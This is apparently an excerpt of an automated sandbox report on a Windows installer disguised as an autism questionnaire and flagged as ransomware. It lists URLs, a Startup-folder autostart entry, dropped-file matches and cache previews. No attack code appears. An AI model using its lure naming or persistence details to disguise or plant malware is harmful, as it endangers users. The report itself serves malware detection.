            http://repository.certum.pl/ctnca.cer09 | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | | high
            http://repository.certum.pl/cscasha2.cer0 | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | | high
            http://ocsp.sectigo.com0 | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://crl.certum.pl/ctnca.crl0k | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | | high
            http://crl.microsoft | powershell.exe, 0000000C.00000003.453010711.0000000008ACF000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://www.remobjects.com/ps | Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282256431.0000000002520000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282523000.000000007FB50000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.dr | false | URL Reputation: safe | unknown
            http://crl.microsof | powershell.exe, 0000000C.00000003.397762259.0000000007388000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.397657917.000000000736E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://subca.ocsp-certum.com01 | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://www.innosetup.com/ | Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282256431.0000000002520000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282523000.000000007FB50000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.dr | false | URL Reputation: safe | unknown
            https://sectigo.com/CPS0D | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://jrsoftware.org0 | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://jrsoftware.org/ | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | | high
            https://www.certum.pl/CPS0 | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000C.00000002.456870724.0000000004631000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.452445471.0000000005301000.00000004.00000001.sdmp | false | | high
            http://crl.certum.pl/cscasha2.crl0q | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | | high
            http://www.certum.pl/CPS0 | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | | high
            https://jrsoftware.org/ishelp/index.php?topic=setupcmdline | Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe | false | | high
            http://cscasha2.ocsp-certum.com04 | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                Contacted IPs

                                Public

                                IP | Domain | Country | Flag | ASN | ASN Name | Malicious

                                Private

                                IP
                                192.168.2.1

                                General Information

                                Joe Sandbox Version: 34.0.0 Boulder Opal
                                Analysis ID: 538201
                                Start date: 11.12.2021
                                Start time: 14:39:32
                                Joe Sandbox Product: CloudBasic
                                Overall analysis duration: 0h 13m 2s
                                Hypervisor based Inspection enabled: false
                                Report type: full
                                Sample file name: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
                                Cookbook file name: default.jbs
                                Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed: 39
                                Number of new started drivers analysed: 0
                                Number of existing processes analysed: 0
                                Number of existing drivers analysed: 0
                                Number of injected processes analysed: 0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode: default
                                Analysis stop reason: Timeout
                                Detection: MAL
                                Classification: mal100.rans.evad.winEXE@39/179@0/1
                                EGA Information:
                                • Successful, ratio: 75%
                                HDC Information:
                                • Successful, ratio: 19.7% (good quality ratio 19.4%)
                                • Quality average: 77.1%
                                • Quality standard deviation: 23.1%
                                HCA Information: Failed
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 92.122.146.26, 80.67.82.97, 80.67.82.80, 20.54.110.249
                                • Excluded domains from analysis (whitelisted): e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, acroipm2.adobe.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, a122.dscd.akamai.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Execution Graph export aborted for target powershell.exe, PID 5972 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

                                Time | Type | Description
                                14:40:39 | API Interceptor | 186x Sleep call for process: powershell.exe modified
                                14:40:50 | API Interceptor | 12x Sleep call for process: RdrCEF.exe modified
                                14:42:55 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a65a7aeb5fe4978dc705b96d177e7.LNK

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp | BF1.exe | Get hash | malicious | Browse |
                                | AIlUgor6h7.exe | Get hash | malicious | Browse |
                                | 7S6KBG5w7W.exe | Get hash | malicious | Browse |
                                | 4r4WFkpvvq.exe | Get hash | malicious | Browse |
                                | 21ABA879CA90E3D4B3B58F61316B6B42C97D31F62DEA2.exe | Get hash | malicious | Browse |
                                | 5Yi7XQkHUQ.exe | Get hash | malicious | Browse |
                                | 991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exe | Get hash | malicious | Browse |
                                | 67MPsax8fd.exe | Get hash | malicious | Browse |
                                | B10274561191CEDB0B16D2A69FDCD4E5062EDFE262184.exe | Get hash | malicious | Browse |
                                | 2HFJezUWHA.exe | Get hash | malicious | Browse |
                                | OabbZE2zf1.exe | Get hash | malicious | Browse |
                                | MiNj1lDY5T.exe | Get hash | malicious | Browse |
                                | 1Edyk9e6oL.exe | Get hash | malicious | Browse |
                                | caYfUkPlTx.exe | Get hash | malicious | Browse |
                                | 8CY6nr1mmt.exe | Get hash | malicious | Browse |
                                | OGzuPn8ahY.exe | Get hash | malicious | Browse |
                                | OPKyR75fJn.exe | Get hash | malicious | Browse |
                                | mapcmapc-registratio_39379648.exe | Get hash | malicious | Browse |
                                | 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe | Get hash | malicious | Browse |
                                | 42E07EA0F43BEC6913D6AC78FF74536695AE273CD28DB.exe | Get hash | malicious | Browse |
                                C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll | 6rfyiAq0nM.msi | Get hash | malicious | Browse |
                                | ListSvc.exe | Get hash | malicious | Browse |
                                | Freddie-Mac-Warrantable-Condo-List.exe | Get hash | malicious | Browse |
                                | iumk21HlC8.exe | Get hash | malicious | Browse |
                                | FxWNeUN38R.exe | Get hash | malicious | Browse |
                                | 7CiwBIK7nr.exe | Get hash | malicious | Browse |
                                | 978B4AC05A227B23EF7E4FADFF92966339BA1413BAC5A.exe | Get hash | malicious | Browse |
                                | Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exe | Get hash | malicious | Browse |
                                | How-To-Get-A-Statement-From-Netspend.exe | Get hash | malicious | Browse |
                                | gj13C7atN2.exe | Get hash | malicious | Browse |

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):205
                                                                                            Entropy (8bit):5.643412364247602
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js .'~..|1/....."#.D.SXCJm.A.A..Eo........c.............d.{v.^.G...d.W.:...P..k%..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):174
                                                                                            Entropy (8bit):5.557681201069607
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js .W...|1/....."#.D...>Jm.A.A..Eo......).(..........1.x.'.vI..*|Z..o...+.4....0..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):5.574227650269549
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js .....|1/....."#.DK..BJm.A.A..Eo......q`............hvDO.N.t@.....n.*...... ....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0ace9ee3d914a5c0_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):232
                                                                                            Entropy (8bit):5.650019318499737
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......h.....'....._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-tool-view.js ...?.|1/....."#.D..CJm.A.A..Eo......A.f..........8 P..a...R..Y....7.@..2Dm{..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.5557033501491
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js .....|1/....."#.D.=.CJm.A.A..Eo.........E........k.Q.....-_..y.....O...>..1....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):216
                                                                                            Entropy (8bit):5.612388645423502
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js .7...|1/....."#.D.LCBJm.A.A..Eo......$h.>.........].>....uUf..N...k......c..l.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):209
                                                                                            Entropy (8bit):5.508844885607995
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js .kg..|1/....."#.DS..BJm.A.A..Eo...................c..y/L....|y.n..C/I.....X7-ne.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):179
                                                                                            Entropy (8bit):5.472029893394346
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ..&..|1/....."#.DM.3AJm.A.A..Eo......j.Y..........y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\39c14c1f4b086971_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):212
                                                                                            Entropy (8bit):5.601323454154048
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......T....,.^...._keyhttps://rna-resource.acrobat.com/static/js/plugins/walk-through/js/selector.js .s...|1/....."#.D...AJm.A.A..Eo....................`.....^....L>..Xa./......C.y.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):214
                                                                                            Entropy (8bit):5.487536186597005
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js .E1..|1/....."#.D%v.CJm.A.A..Eo..................Q..E.=....=h`t..t..3%A.F$..w..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):177
                                                                                            Entropy (8bit):5.504847142449123
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ..$..|1/....."#.D..3AJm.A.A..Eo.......,...........PU ....t^.....a.k..u.7.M.BW6#}..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):187
                                                                                            Entropy (8bit):5.573337297854372
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js .....|1/....."#.D.x.AJm.A.A..Eo......<U............q.O...j....._y..L^z...?..@N..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):244
                                                                                            Entropy (8bit):5.589320292466083
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ..Z..|1/....."#.D..fCJm.A.A..Eo......-................H...{...2../.k`..r4.C. .A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6267ed4d4a13f54b_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.565683448958373
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R....L......_keyhttps://rna-resource.acrobat.com/static/js/plugins/walk-through/js/plugin.js .....|1/....."#.D.S.AJm.A.A..Eo.........M...........G.3D.....Q.g0...._.Q.........A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):211
                                                                                            Entropy (8bit):5.486410005447679
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js ..|..|1/....."#.D&S.BJm.A.A..Eo.......w|..........A.o]@r..Q.....<w.....].n\....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):202
                                                                                            Entropy (8bit):5.5822913627631054
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js .b%..|1/....."#.D..OBJm.A.A..Eo....................4T].....Tw.....(..b...EO....9.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):211
                                                                                            Entropy (8bit):5.528696396448641
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js ..o..|1/....."#.D}..BJm.A.A..Eo.......b.<........@..{o]...9o|..qY....T....{..u.b..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):206
                                                                                            Entropy (8bit):5.534418225427948
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js .....|1/....."#.D.z.AJm.A.A..Eo.......|mb.........t\a......x5.'OuE.C..@......x..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):218
                                                                                            Entropy (8bit):5.544963313983021
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js .^#..|1/....."#.D.~7BJm.A.A..Eo.........0...............7...o..a=.98I......(3.$G.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):230
                                                                                            Entropy (8bit):5.571479876581485
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ..>..|1/....."#.DL..AJm.A.A..Eo......y.2...........~..rw.+[....!.)?..f.U..(=.=.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186
                                                                                            Entropy (8bit):5.535047546351228
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ....|1/....."#.D?p.AJm.A.A..Eo.......~)@..........~]...%s..<...n.f..<.....1#..U..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):207
                                                                                            Entropy (8bit):5.586690995321149
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js .~...|1/....."#.D..ICJm.A.A..Eo........5s..........z._a...'.v.......4p3..1.']...A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.538713843032575
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js .....|1/....."#.DFy.BJm.A.A..Eo................c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):223
                                                                                            Entropy (8bit):5.5638521345703325
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js .....|1/....."#.D...AJm.A.A..Eo.......(............%.k.SZ..~W.....:)'B..ad......A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):213
                                                                                            Entropy (8bit):5.621925224869287
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ..a..|1/....."#.DF..AJm.A.A..Eo.......r..........;"./N_.,.:C..2....9L.H...3:...A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):208
                                                                                            Entropy (8bit):5.546907727168277
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js ....|1/....."#.DB..AJm.A.A..Eo......*..I........Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):188
                                                                                            Entropy (8bit):5.572329118833723
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js .M...|1/....."#.D..tAJm.A.A..Eo.......~..........z?...SwC...^..y.....V..7R-O.....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0
